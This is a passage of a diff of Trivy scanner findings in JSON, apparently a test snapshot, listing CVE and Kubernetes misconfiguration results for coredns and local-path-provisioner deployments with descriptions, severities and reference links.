"https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", - ], - }, - "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", + "value": "https://lists.debian.org/debian-lts-announce/2020/12/msg00021.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DGSI34Y5LQ5RYXN4M2I5ZQT65LFVDOUU/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PWPSSZNZOBJU2YR6Z4TGHXKYW3YP5QG7/", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-1971", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/56152", + "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-20:33.openssl.asc", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", + "value": "https://security.gentoo.org/glsa/202012-13", }, { "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://security.netapp.com/advisory/ntap-20201218-0005/", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "https://ubuntu.com/security/notices/USN-4662-1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://ubuntu.com/security/notices/USN-4745-1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1971", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://www.debian.org/security/2020/dsa-4807", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://www.openssl.org/news/secadv/20201208.txt", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujan2021.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2020-11", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-10", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "3.0.0-20220521103104-8f96da9f5d5e", - "foundIn": "Target: 'coredns' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-28948", - "installedVersion": "v3.0.0-20210107192922-496545a6307b", - "packageName": "gopkg.in/yaml.v3", + "fixedVersion": "1.1.1j-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-23841", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-28948", - "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", - "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", - "https://github.com/go-yaml/yaml/issues/666", - "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", - "https://security.netapp.com/advisory/ntap-20220923-0006/", - "https://www.cve.org/CVERecord?id=CVE-2022-28948", + "http://seclists.org/fulldisclosure/2021/May/67", + "http://seclists.org/fulldisclosure/2021/May/68", + "http://seclists.org/fulldisclosure/2021/May/70", + "https://access.redhat.com/security/cve/CVE-2021-23841", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "https://github.com/advisories/GHSA-84rm-qf37-fgc2", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "https://linux.oracle.com/cve/CVE-2021-23841.html", + "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", + "https://rustsec.org/advisories/RUSTSEC-2021-0058", + "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210219-0009/", + "https://security.netapp.com/advisory/ntap-20210513-0002/", + "https://support.apple.com/kb/HT212528", + "https://support.apple.com/kb/HT212529", + "https://support.apple.com/kb/HT212534", + "https://ubuntu.com/security/notices/USN-4738-1", + "https://ubuntu.com/security/notices/USN-4745-1", + "https://www.cve.org/CVERecord?id=CVE-2021-23841", + "https://www.debian.org/security/2021/dsa-4855", + "https://www.openssl.org/news/secadv/20210216.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-03", + "https://www.tenable.com/security/tns-2021-09", ], }, "category": "Vulnerability", - "description": "An issue in the Unmarshal function in Go-Yaml v3 causes the program to crash when attempting to deserialize invalid input.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", + "description": "The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "crash when attempting to deserialize invalid input", + "name": "openssl: NULL pointer dereference in X509_issuer_and_serial_hash()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-28948", + "value": "https://avd.aquasec.com/nvd/cve-2021-23841", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-28948", + "value": "http://seclists.org/fulldisclosure/2021/May/67", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-hp87-p4gw-j4gq", + "value": "http://seclists.org/fulldisclosure/2021/May/68", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/commit/8f96da9f5d5eff988554c1aae1784627c4bf6754", + "value": "http://seclists.org/fulldisclosure/2021/May/70", }, { "type": "URL", - "value": "https://github.com/go-yaml/yaml/issues/666", + "value": "https://access.redhat.com/security/cve/CVE-2021-23841", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28948", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0006/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-28948", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'coredns' of Deployment 'coredns' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://github.com/advisories/GHSA-84rm-qf37-fgc2", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV020", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv020", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", - "name": "Runs with low user ID(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsUser' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv020", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://linux.oracle.com/cve/CVE-2021-23841.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV021", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-runasuser/", - "https://avd.aquasec.com/misconfig/ksv021", - ], - }, - "category": "Misconfiguration", - "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", - "name": "Runs with low group ID(Container 'coredns' of Deployment 'coredns' should set 'securityContext.runAsGroup' > 10000)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv021", + "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV022", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", - "https://avd.aquasec.com/misconfig/ksv022", - ], - }, - "category": "Misconfiguration", - "description": "Adding NET_RAW or capabilities beyond the default set must be disallowed.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Do not set spec.containers[*].securityContext.capabilities.add and spec.initContainers[*].securityContext.capabilities.add", - "name": "Non-default capabilities added(Container 'coredns' of Deployment 'coredns' should not set 'securityContext.capabilities.add')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv022", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV030", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv030", - ], - }, - "category": "Misconfiguration", - "description": "The RuntimeDefault/Localhost seccomp profile must be required, or allow specific additional profiles.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'spec.securityContext.seccompProfile.type', 'spec.containers[*].securityContext.seccompProfile' and 'spec.initContainers[*].securityContext.seccompProfile' to 'RuntimeDefault' or undefined.", - "name": "Default Seccomp profile not set(Either Pod or Container should set 'securityContext.seccompProfile.type' to 'RuntimeDefault')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv030", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/coredns' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV106", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv106", - ], - }, - "category": "Misconfiguration", - "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Deployment&Name=coredns", - "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", - "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv106", + "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://support.apple.com/kb/HT212528", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.31-13+deb11u5", - "packageName": "libc6", - "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", - ], - }, - "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", + "value": "https://support.apple.com/kb/HT212529", }, { "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", + "value": "https://support.apple.com/kb/HT212534", }, { "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", + "value": "https://ubuntu.com/security/notices/USN-4738-1", }, { "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "https://ubuntu.com/security/notices/USN-4745-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-23841", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://www.debian.org/security/2021/dsa-4855", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://www.openssl.org/news/secadv/20210216.txt", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-03", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.31-13+deb11u5", - "packageName": "libc6", + "fixedVersion": "1.1.1k-r0", + "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", + "id": "CVE-2021-3449", + "installedVersion": "1.1.1g-r0", + "packageName": "libcrypto1.1", "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "https://access.redhat.com/security/cve/CVE-2021-3449", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", + "https://github.com/advisories/GHSA-83mx-573x-5rw9", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "https://linux.oracle.com/cve/CVE-2021-3449.html", + "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "https://rustsec.org/advisories/RUSTSEC-2021-0055", + "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", + "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210326-0006/", + "https://security.netapp.com/advisory/ntap-20210513-0002/", + "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "https://ubuntu.com/security/notices/USN-4891-1", + "https://ubuntu.com/security/notices/USN-5038-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3449", + "https://www.debian.org/security/2021/dsa-4875", + "https://www.openssl.org/news/secadv/20210325.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-05", + "https://www.tenable.com/security/tns-2021-06", + "https://www.tenable.com/security/tns-2021-09", + "https://www.tenable.com/security/tns-2021-10", ], }, "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "description": "An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).", "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "name": "openssl: NULL pointer dereference in signature_algorithms processing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", + "value": "https://avd.aquasec.com/nvd/cve-2021-3449", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", }, { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://access.redhat.com/security/cve/CVE-2021-3449", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.31-13+deb11u5", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "glibc: stack guard protection bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "https://github.com/advisories/GHSA-83mx-573x-5rw9", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "https://linux.oracle.com/cve/CVE-2021-3449.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/local-path-provisioner:v0.0.22-kind.0 (debian 11.6)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.31-13+deb11u5", - "packageName": "libc6", - "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real 